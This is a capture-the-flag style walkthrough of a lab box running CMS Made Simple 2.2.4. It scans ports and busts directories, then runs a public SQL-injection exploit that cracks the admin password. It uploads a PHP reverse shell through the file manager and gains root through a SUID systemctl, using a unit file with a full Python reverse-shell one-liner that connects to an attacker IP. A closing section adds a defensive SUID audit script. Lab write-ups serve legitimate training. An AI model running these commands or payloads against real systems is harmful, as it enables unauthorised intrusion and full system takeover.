Simple
nmap
mkdir nmap
sudo rustscan -a 172.31.1.2 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
Port 80 is open and serving a web server.

Web enumeration
The footer shows it is running CMS Made Simple v2.2.4.

Since it's a web server, I'll run directory busting
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.31.1.2/FUZZ -ignore-body -recursion -recursion-depth 2 -t 40 -ic -c -o webdir.domain.root -D -e php,html,txt
After some time it found /admin, which looks interesting. I tried logging in with default credentials, but nothing worked.

Since we have the version, let's take a look with searchsploit. It turns out this version of CMS Made Simple is vulnerable to SQL injection.

Exploitation
I run the script with the following parameters:
python 46635.py -u http://172.31.1.2/ --crack -w /opt/wordlist/rockyou.txt
After some time, it returned the following information:
[+] Salt for password found: 18207a2929431d9f
[+] Username found: david
[+] Email found: david@simple.csl
[+] Password found: bbeabbca0fff4e851f840ffad0680dcf
[+] Password cracked: punisher
Log in with these credentials on /admin.

Go to Content > File Manager; this is where we will upload a reverse shell.

Create your own PHP reverse shell, but in this example I will use this awesome shell: https://github.com/ivan-sincek/php-reverse-shell
Rename your shell to <shellname>.txt and upload it.

Now we need to give our shell a .php extension. To do that, create a copy of the shell and name it with the .php extension. Make sure your target directory is /uploads.

Now we have successfully uploaded our reverse shell.

Set up a netcat listener and visit /uploads/shellname.php. You should receive your shell right away.

Privilege Escalation
Let's transfer linpeas.sh to the target machine.

Transfer the bash script with wget.

Run linpeas.sh.

The systemctl binary has the SUID bit set; we can use this to gain a root shell.

Create shell.service in any writable folder with the following content, editing the IP address and port accordingly:
[Service]
Type=oneshot
ExecStart=/bin/sh -c "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.0.41\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
[Install]
WantedBy=multi-user.target
Create a soft link to the file you have created.

Set up a netcat listener and run the following command to trigger the exploit:
systemctl start shell.service
Sweet, now you're root! :D
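From the defender's side, the root cause here is a SUID bit on a binary that should never carry one. The following shell function is an added example, not part of the original writeup: it lists SUID files under a given root whose names are not on a constructed allowlist of binaries that are normally SUID on Debian-like hosts, so a SUID systemctl like the one on this box is reported. The allowlist contents are an assumption and should be adjusted per host.

```shell
#!/bin/sh
# Added SUID audit helper (example, not from the original writeup).
# Constructed allowlist of basenames that are commonly shipped SUID on
# Debian-like systems; assumption, adjust for the host being audited.
SUID_ALLOWLIST="passwd sudo su mount umount chsh chfn newgrp gpasswd"

# in_allowlist NAME -> returns 0 if NAME is one of the allowlisted basenames
in_allowlist() {
    for allowed in $SUID_ALLOWLIST; do
        [ "$1" = "$allowed" ] && return 0
    done
    return 1
}

# find_unexpected_suid ROOT -> prints, one per line, every regular file under
# ROOT with the SUID bit set (mode 4000) whose basename is not allowlisted.
# Stays on one filesystem (-xdev) and skips /proc and /sys.
find_unexpected_suid() {
    find "$1" -xdev \( -path /proc -o -path /sys \) -prune -o \
        -type f -perm -4000 -print 2>/dev/null |
    while IFS= read -r path; do
        in_allowlist "$(basename "$path")" || printf '%s\n' "$path"
    done
}

# Usage: sh suid-audit.sh /   (with no argument the script only defines the functions)
if [ "$#" -gt 0 ]; then
    find_unexpected_suid "$1"
fi
```

Any path it prints (for example a systemctl or other non-standard SUID binary) is worth comparing against the package manager's recorded file modes and against a known-good baseline of the host.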
